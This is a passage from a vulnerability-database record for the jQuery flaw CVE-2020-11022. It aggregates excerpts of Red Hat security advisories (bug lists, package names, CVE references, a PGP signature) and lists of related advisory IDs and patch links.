- Not able to launch pkiconsole\n1856368 - kra-key-generate request is failing\n1857933 - CA Installation is failing with ncipher v12.30 HSM\n1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request\n1869893 - Common certificates are missing in CS.cfg on shared PKI instance\n1871064 - replica install failing during pki-ca component configuration\n1873235 - pki ca-user-cert-add with secure port failed with 'SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT'\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 8):\n\nSource:\napache-commons-collections-3.2.2-10.module+el8.1.0+3366+6dfb954c.src.rpm\napache-commons-lang-2.6-21.module+el8.1.0+3366+6dfb954c.src.rpm\napache-commons-net-3.6-3.module+el8.3.0+6805+72837426.src.rpm\nbea-stax-1.2.0-16.module+el8.1.0+3366+6dfb954c.src.rpm\nglassfish-fastinfoset-1.2.13-9.module+el8.1.0+3366+6dfb954c.src.rpm\nglassfish-jaxb-2.2.11-11.module+el8.1.0+3366+6dfb954c.src.rpm\nglassfish-jaxb-api-2.2.12-8.module+el8.1.0+3366+6dfb954c.src.rpm\njackson-annotations-2.10.0-1.module+el8.2.0+5059+3eb3af25.src.rpm\njackson-core-2.10.0-1.module+el8.2.0+5059+3eb3af25.src.rpm\njackson-databind-2.10.0-1.module+el8.2.0+5059+3eb3af25.src.rpm\njackson-jaxrs-providers-2.9.9-1.module+el8.1.0+3832+9784644d.src.rpm\njackson-module-jaxb-annotations-2.7.6-4.module+el8.1.0+3366+6dfb954c.src.rpm\njakarta-commons-httpclient-3.1-28.module+el8.1.0+3366+6dfb954c.src.rpm\njavassist-3.18.1-8.module+el8.1.0+3366+6dfb954c.src.rpm\njss-4.7.3-1.module+el8.3.0+8058+d5cd4219.src.rpm\nldapjdk-4.22.0-1.module+el8.3.0+6784+6e1e4c62.src.rpm\npki-core-10.9.4-1.module+el8.3.0+8058+d5cd4219.src.rpm\npki-servlet-engine-9.0.30-1.module+el8.3.0+6730+8f9c6254.src.rpm\npython-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.src.rpm\nrelaxngDatatype-2011.1-7.module+el8.1.0+3366+6dfb954c.src.rpm\nresteasy-3.0.26-3.module+el8.2.0+5723+4574fbff.src.rpm\nslf4j-1.7.25-4.module+el8.1.0+3366+6dfb954c.src.rpm\nstax-ex-1.7.7-8.module+el8.2.0+5723+4574fbff.src.rpm\ntomcatjss-7.5.0-1.module+el8.3.0+7355+c59bcbd9.src.rpm\nvelocity-1.7-24.module+el8.1.0+3366+6dfb954c.src.rpm\nxalan-j2-2.7.1-38.module+el8.1.0+3366+6dfb954c.src.rpm\nxerces-j2-2.11.0-34.module+el8.1.0+3366+6dfb954c.src.rpm\nxml-commons-apis-1.4.01-25.module+el8.1.0+3366+6dfb954c.src.rpm\nxml-commons-resolver-1.2-26.module+el8.1.0+3366+6dfb954c.src.rpm\nxmlstreambuffer-1.5.4-8.module+el8.2.0+5723+4574fbff.src.rpm\nxsom-0-19.20110809svn.module+el8.1.0+3366+6dfb954c.src.rpm\n\naarch64:\njss-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\njss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\njss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\njss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.aarch64.rpm\npython-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm\npython-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm\npython3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm\npython3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.aarch64.rpm\n\nnoarch:\napache-commons-collections-3.2.2-10.module+el8.1.0+3366+6dfb954c.noarch.rpm\napache-commons-lang-2.6-21.module+el8.1.0+3366+6dfb954c.noarch.rpm\napache-commons-net-3.6-3.module+el8.3.0+6805+72837426.noarch.rpm\nbea-stax-api-1.2.0-16.module+el8.1.0+3366+6dfb954c.noarch.rpm\nglassfish-fastinfoset-1.2.13-9.module+el8.1.0+3366+6dfb954c.noarch.rpm\nglassfish-jaxb-api-2.2.12-8.module+el8.1.0+3366+6dfb954c.noarch.rpm\nglassfish-jaxb-core-2.2.11-11.module+el8.1.0+3366+6dfb954c.noarch.rpm\nglassfish-jaxb-runtime-2.2.11-11.module+el8.1.0+3366+6dfb954c.noarch.rpm\nglassfish-jaxb-txw2-2.2.11-11.module+el8.1.0+3366+6dfb954c.noarch.rpm\njackson-annotations-2.10.0-1.module+el8.2.0+5059+3eb3af25.noarch.rpm\njackson-core-2.10.0-1.module+el8.2.0+5059+3eb3af25.noarch.rpm\njackson-databind-2.10.0-1.module+el8.2.0+5059+3eb3af25.noarch.rpm\njackson-jaxrs-json-provider-2.9.9-1.module+el8.1.0+3832+9784644d.noarch.rpm\njackson-jaxrs-providers-2.9.9-1.module+el8.1.0+3832+9784644d.noarch.rpm\njackson-module-jaxb-annotations-2.7.6-4.module+el8.1.0+3366+6dfb954c.noarch.rpm\njakarta-commons-httpclient-3.1-28.module+el8.1.0+3366+6dfb954c.noarch.rpm\njavassist-3.18.1-8.module+el8.1.0+3366+6dfb954c.noarch.rpm\njavassist-javadoc-3.18.1-8.module+el8.1.0+3366+6dfb954c.noarch.rpm\nldapjdk-4.22.0-1.module+el8.3.0+6784+6e1e4c62.noarch.rpm\nldapjdk-javadoc-4.22.0-1.module+el8.3.0+6784+6e1e4c62.noarch.rpm\npki-base-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm\npki-base-java-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm\npki-ca-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm\npki-kra-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm\npki-server-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm\npki-servlet-4.0-api-9.0.30-1.module+el8.3.0+6730+8f9c6254.noarch.rpm\npki-servlet-engine-9.0.30-1.module+el8.3.0+6730+8f9c6254.noarch.rpm\npython3-pki-10.9.4-1.module+el8.3.0+8058+d5cd4219.noarch.rpm\nrelaxngDatatype-2011.1-7.module+el8.1.0+3366+6dfb954c.noarch.rpm\nresteasy-3.0.26-3.module+el8.2.0+5723+4574fbff.noarch.rpm\nslf4j-1.7.25-4.module+el8.1.0+3366+6dfb954c.noarch.rpm\nslf4j-jdk14-1.7.25-4.module+el8.1.0+3366+6dfb954c.noarch.rpm\nstax-ex-1.7.7-8.module+el8.2.0+5723+4574fbff.noarch.rpm\ntomcatjss-7.5.0-1.module+el8.3.0+7355+c59bcbd9.noarch.rpm\nvelocity-1.7-24.module+el8.1.0+3366+6dfb954c.noarch.rpm\nxalan-j2-2.7.1-38.module+el8.1.0+3366+6dfb954c.noarch.rpm\nxerces-j2-2.11.0-34.module+el8.1.0+3366+6dfb954c.noarch.rpm\nxml-commons-apis-1.4.01-25.module+el8.1.0+3366+6dfb954c.noarch.rpm\nxml-commons-resolver-1.2-26.module+el8.1.0+3366+6dfb954c.noarch.rpm\nxmlstreambuffer-1.5.4-8.module+el8.2.0+5723+4574fbff.noarch.rpm\nxsom-0-19.20110809svn.module+el8.1.0+3366+6dfb954c.noarch.rpm\n\nppc64le:\njss-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\njss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\njss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\njss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\npki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\npki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\npki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\npki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\npki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\npki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.ppc64le.rpm\npython-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm\npython-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm\npython3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm\npython3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.ppc64le.rpm\n\ns390x:\njss-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\njss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\njss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\njss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.s390x.rpm\npython-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm\npython-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm\npython3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm\npython3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.s390x.rpm\n\nx86_64:\njss-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\njss-debuginfo-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\njss-debugsource-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\njss-javadoc-4.7.3-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npki-core-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npki-core-debugsource-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npki-symkey-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npki-symkey-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npki-tools-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npki-tools-debuginfo-10.9.4-1.module+el8.3.0+8058+d5cd4219.x86_64.rpm\npython-nss-debugsource-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm\npython-nss-doc-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm\npython3-nss-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm\npython3-nss-debuginfo-1.0.1-10.module+el8.1.0+3366+6dfb954c.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-9251\nhttps://access.redhat.com/security/cve/CVE-2016-10735\nhttps://access.redhat.com/security/cve/CVE-2018-14040\nhttps://access.redhat.com/security/cve/CVE-2018-14042\nhttps://access.redhat.com/security/cve/CVE-2019-8331\nhttps://access.redhat.com/security/cve/CVE-2019-10146\nhttps://access.redhat.com/security/cve/CVE-2019-10179\nhttps://access.redhat.com/security/cve/CVE-2019-10221\nhttps://access.redhat.com/security/cve/CVE-2019-11358\nhttps://access.redhat.com/security/cve/CVE-2020-1721\nhttps://access.redhat.com/security/cve/CVE-2020-11022\nhttps://access.redhat.com/security/cve/CVE-2020-11023\nhttps://access.redhat.com/security/cve/CVE-2020-15720\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/\n\n8. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX6I3GNzjgjWX9erEAQiK8w//dJasljC8LcJheQtDfUXL+EG52rGjpyxU\nB5iSYariTDhQOFRt22udOjbdBaISRD77ozLdz0LusA1NBtR3hQ49ryIWyMUxLNsi\n46FLY44YxMY7uofZJExUJoEkN39CYwXqIOaaGnZ8mkn4QVdoKG+UBvBL3gKcE3uk\nh+PWQaasCHL96ZuLz5OB1ya0StcgVcnIDOJleP0f4TGI8w5LKSj1bdJz2fD1H+JP\niBa3QVedFanQpWVqCAjaw2lH+fQUB4F936XltKsqCKD9uaX1A2m+xAMZ8wuHcCUl\nNudj4LwT06xGd36tyQVh+0ZolB7aKmErYNicv25VNz1c/QlmXCiBJi3Y62/a7La0\nt8bGYPE01RTI1YvLs8c+Bw0SH+NcGPGtLw9Vd8w9hFYed7JUP6Iv9v/lSfbiUXDD\nR5gcEJPQtN2pRsqZaCmQCY2i9aNwjmyZ3wggmXJ4DtEy5adTmAmTL/Alf8kx1rfC\nUjfeBWVQ01QMIcwNCZM9ly6au06fioPjHhusCFPqPWnGCoT6mysF//ZOhLemUQci\necbYX+JbbUnbyWQPVIBhV/Zj4D6SqNtY5rciorwTedC8n2zX/8ORTCn1PZz8Oc1S\nebaoJI0TA2DuiUtPkKz1REcD8rnSCxPIhCYWfb4nIXKGjBINW8ueyG27VPprkSOh\n+Ybici9RaUE=VLtX\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001\nJBEAP-23865 - [GSS](7.4.z) Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001\nJBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001\nJBEAP-23927 - Tracker bug for the EAP 7.4.9 release for RHEL-8\nJBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001\nJBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001\nJBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001\nJBEAP-24100 - [GSS](7.4.z) Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001\nJBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value\nJBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001\nJBEAP-24132 - [GSS](7.4.z) Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001\nJBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001\nJBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002\nJBEAP-24191 - [GSS](7.4.z) Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001\nJBEAP-24195 - [GSS](7.4.z) Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001\nJBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003\nJBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2\nJBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001\nJBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001\n\n7. Description:\n\nSecurity Fix(es):\n\n* Addressed a security issue which can allow a malicious playbook author to\nelevate to the awx user from outside the isolated environment:\nCVE-2021-20253\n* Upgraded to a more recent version of nginx to address CVE-2019-20372\n* Upgraded to a more recent version of autobahn to address CVE-2020-35678\n* Upgraded to a more recent version of jquery to address CVE-2020-11022 and\nCVE-2020-11023\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Solution:\n\nFor information on upgrading Ansible Tower, reference the Ansible Tower\nUpgrade and Migration Guide:\nhttps://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/\nindex.html\n\n4. Description:\n\nRed Hat Identity Management (IdM) is a centralized authentication, identity\nmanagement, and authorization solution for both traditional and cloud-based\nenterprise environments. \n\nThe following packages have been upgraded to a later upstream version: ipa\n(4.8.7), softhsm (2.6.0), opendnssec (2.1.6). Bugs fixed (https://bugzilla.redhat.com/):\n\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1430365 - [RFE] Host-group names command rename\n1488732 - fake_mname in named.conf is no longer effective\n1585020 - Enable compat tree to provide information about AD users and groups on trust agents\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1651577 - [WebUI] IPA Error 3007: RequirmentError\" while adding members in \"User ID overrides\" tab\n1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute\n1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1701233 - [RFE] support setting supported signature methods on the token\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection\n1746830 - Memory leak during search of idview overrides\n1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch\n1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming\n1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn't work in GUI (it works only from CLI)\n1759888 - Rebase OpenDNSSEC to 2.1\n1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED\n1777806 - When Service weight is set as 0 for server in IPA location \"IPA Error 903: InternalError\" is displayed\n1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service\n1801698 - [RFE] Changing default hostgroup is too easy\n1802471 - SELinux policy for ipa-custodia\n1809835 - RFE: ipa group-add-member: number of failed should also be emphasized\n1810154 - RFE: ipa-backup should compare locally and globally installed server roles\n1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time\n1813330 - ipa-restore does not restart httpd\n1816784 - KRA install fails if all KRA members are Hidden Replicas\n1818765 - [Rebase] Rebase ipa to 4.8.6+\n1818877 - [Rebase] Rebase to softhsm 2.6.0+\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1831732 - AVC avc: denied { dac_override } for comm=\"ods-enforcerd\n1831935 - AD authentication with IdM against SQL Server\n1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11\n1833266 - [dirsrv] set 'nsslapd-enable-upgrade-hash: off' as this raises warnings\n1834264 - BIND rebase: rebuild against new so version\n1834909 - softhsm use-after-free on process exit\n1845211 - Rebase bind-dyndb-ldap to 11.3\n1845537 - IPA bind configuration issue\n1845596 - ipa trust-add fails with 'Fetching domains from trusted forest failed'\n1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts\n1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7\n1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn\n1849914 - FreeIPA - Utilize 256-bit AJP connector passwords\n1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition\n1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2\n1853263 - ipa-selinux package missing\n1857157 - replica install failing with avc denial for custodia component\n1858318 - AttributeError: module 'ssl' has no attribute 'SSLCertVerificationError' when upgrading ca-less ipa master\n1859213 - AVC denial during ipa-adtrust-install --add-agents\n1863079 - ipa-epn command displays 'exception: ConnectionRefusedError: [Errno 111] Connection refused'\n1863616 - CA-less install does not set required permissions on KDC certificate\n1866291 - EPN: enhance input validation\n1866938 - ipa-epn fails to retrieve user data if some user attributes are not present\n1868432 - Unhandled Python exception in '/usr/libexec/ipa/ipa-pki-retrieve-key'\n1869311 - ipa trust-add fails with 'Fetching domains from trusted forest failed'\n1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less\n1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain\n1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. \n1879604 - pkispawn logs files are empty\n\n6. Description:\n\n* Fixed two jQuery vulnerabilities (CVE-2020-11022, CVE-2020-11023)\n* Improved Ansible Tower's web service configuration to allow for\nprocessing more simultaneous HTTP(s) requests by default\n* Updated several dependencies of Ansible Tower's User Interface to address\n(CVE-2020-7720, CVE-2020-7743, CVE-2020-7676)\n* Updated to the latest version of python-psutil to address CVE-2019-18874\n* Added several optimizations to improve performance for a variety of\nhigh-load simultaneous job launch use cases\n* Fixed workflows to no longer prevent certain users from being able to\nedit approval nodes\n* Fixed confusing behavior for social auth logins across distinct browser\ntabs\n* Fixed launching of Job Templates that use prompt-at-launch Ansible Vault\ncredentials\n\n3", sources: [ { db: "NVD", id: "CVE-2020-11022", }, { db: "VULHUB", id: "VHN-163559", }, { db: "VULMON", id: "CVE-2020-11022", }, { db: "PACKETSTORM", id: "159852", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "161727", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "160274", }, ], trust: 1.53, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2020-11022", trust: 1.7, }, { db: "PACKETSTORM", id: "162159", trust: 1.2, }, { db: "TENABLE", id: "TNS-2021-02", trust: 1.2, }, { db: "TENABLE", id: "TNS-2020-10", trust: 1.2, }, { db: "TENABLE", id: "TNS-2020-11", trust: 1.2, }, { db: "TENABLE", id: "TNS-2021-10", trust: 1.2, }, { db: "PACKETSTORM", id: "170823", trust: 0.2, }, { db: "PACKETSTORM", id: "159852", trust: 0.2, }, { db: "PACKETSTORM", id: "160274", trust: 0.2, }, { db: "PACKETSTORM", id: "159876", trust: 0.2, }, { db: "PACKETSTORM", id: "161727", trust: 0.2, }, { db: "PACKETSTORM", id: "171213", trust: 0.1, }, { db: "PACKETSTORM", id: "171214", trust: 0.1, }, { db: "PACKETSTORM", id: "171212", trust: 0.1, }, { db: "PACKETSTORM", id: "171215", trust: 0.1, }, { db: "PACKETSTORM", id: "170821", trust: 0.1, }, { db: "PACKETSTORM", id: "159275", trust: 0.1, }, { db: "PACKETSTORM", id: "159353", trust: 0.1, }, { db: "PACKETSTORM", id: "170819", trust: 0.1, }, { db: "PACKETSTORM", id: "168304", trust: 0.1, }, { db: "PACKETSTORM", id: "170817", trust: 0.1, }, { db: "PACKETSTORM", id: "158750", trust: 0.1, }, { db: "PACKETSTORM", id: "159513", trust: 0.1, }, { db: "PACKETSTORM", id: "157850", trust: 0.1, }, { db: "PACKETSTORM", id: "158555", trust: 0.1, }, { db: "CNNVD", id: "CNNVD-202004-2429", trust: 0.1, }, { db: "VULHUB", id: "VHN-163559", trust: 0.1, }, { db: "ICS CERT", id: "ICSA-22-055-02", trust: 0.1, }, { db: "VULMON", id: "CVE-2020-11022", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-163559", }, { db: "VULMON", id: "CVE-2020-11022", }, { db: "PACKETSTORM", id: "159852", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "161727", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "160274", }, { db: "NVD", id: "CVE-2020-11022", }, ], }, id: "VAR-202004-2191", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-163559", }, ], trust: 0.01, }, last_update_date: "2024-11-29T21:07:26.888000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Red Hat: Moderate: OpenShift Container Platform 3.11 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20202217 - Security Advisory", }, { title: "Debian Security Advisories: DSA-4693-1 drupal7 -- security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories&qid=978f239ce60a8a08c53eb64ba189d0f6", }, { title: "Red Hat: Moderate: Red Hat AMQ Interconnect 1.9.0 release and security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20204211 - Security Advisory", }, { title: "Red Hat: Moderate: Red Hat Virtualization security, bug fix, and enhancement update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20203807 - Security Advisory", }, { title: "Red Hat: Moderate: Red Hat OpenShift Service Mesh security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20202362 - Security Advisory", }, { title: "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.7.4-1 - RHEL7 Container", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20205249 - Security Advisory", }, { title: "Debian CVElist Bug Report Logs: wordpress: WordPress 5.9.2 security and maintenance release", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=e7014c0a68e8d9bc31a54125059176dc", }, { title: "Red Hat: Important: RHV Manager (ovirt-engine) [ovirt-4.5.2] bug fix and security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20226393 - Security Advisory", }, { title: "Red Hat: Moderate: ipa security, bug fix, and enhancement update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20203936 - Security Advisory", }, { title: "Red Hat: Important: RHV Manager (ovirt-engine) 4.4 security, bug fix, and enhancement update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20203247 - Security Advisory", }, { title: "Red Hat: Moderate: idm:DL1 and idm:client security, bug fix, and enhancement update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20204670 - Security Advisory", }, { title: "Red Hat: Important: Red Hat Single Sign-On 7.4.1 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20202813 - Security Advisory", }, { title: "Tenable Security Advisories: [R1] Nessus 8.13.0 Fixes One Third-party Vulnerability", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories&qid=TNS-2020-10", }, { title: "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03688 rev. 1 - Certain HP Printer and MFP products - Cross-Site Scripting (XSS)", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin&qid=0c6e8f969487f201b1d56f59bd98f443", }, { title: "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03688 rev. 1 - Certain HP Printer and MFP products - Cross-Site Scripting (XSS)", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin&qid=e57a04f097f54c762da82263eadc1b8a", }, { title: "Red Hat: Moderate: pki-core:10.6 and pki-deps:10.6 security, bug fix, and enhancement update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20204847 - Security Advisory", }, { title: "Tenable Security Advisories: [R1] Nessus Network Monitor 5.13.0 Fixes One Third-party Vulnerability", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories&qid=TNS-2021-02", }, { title: "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.4.9 Security update", trust: 0.1, url: 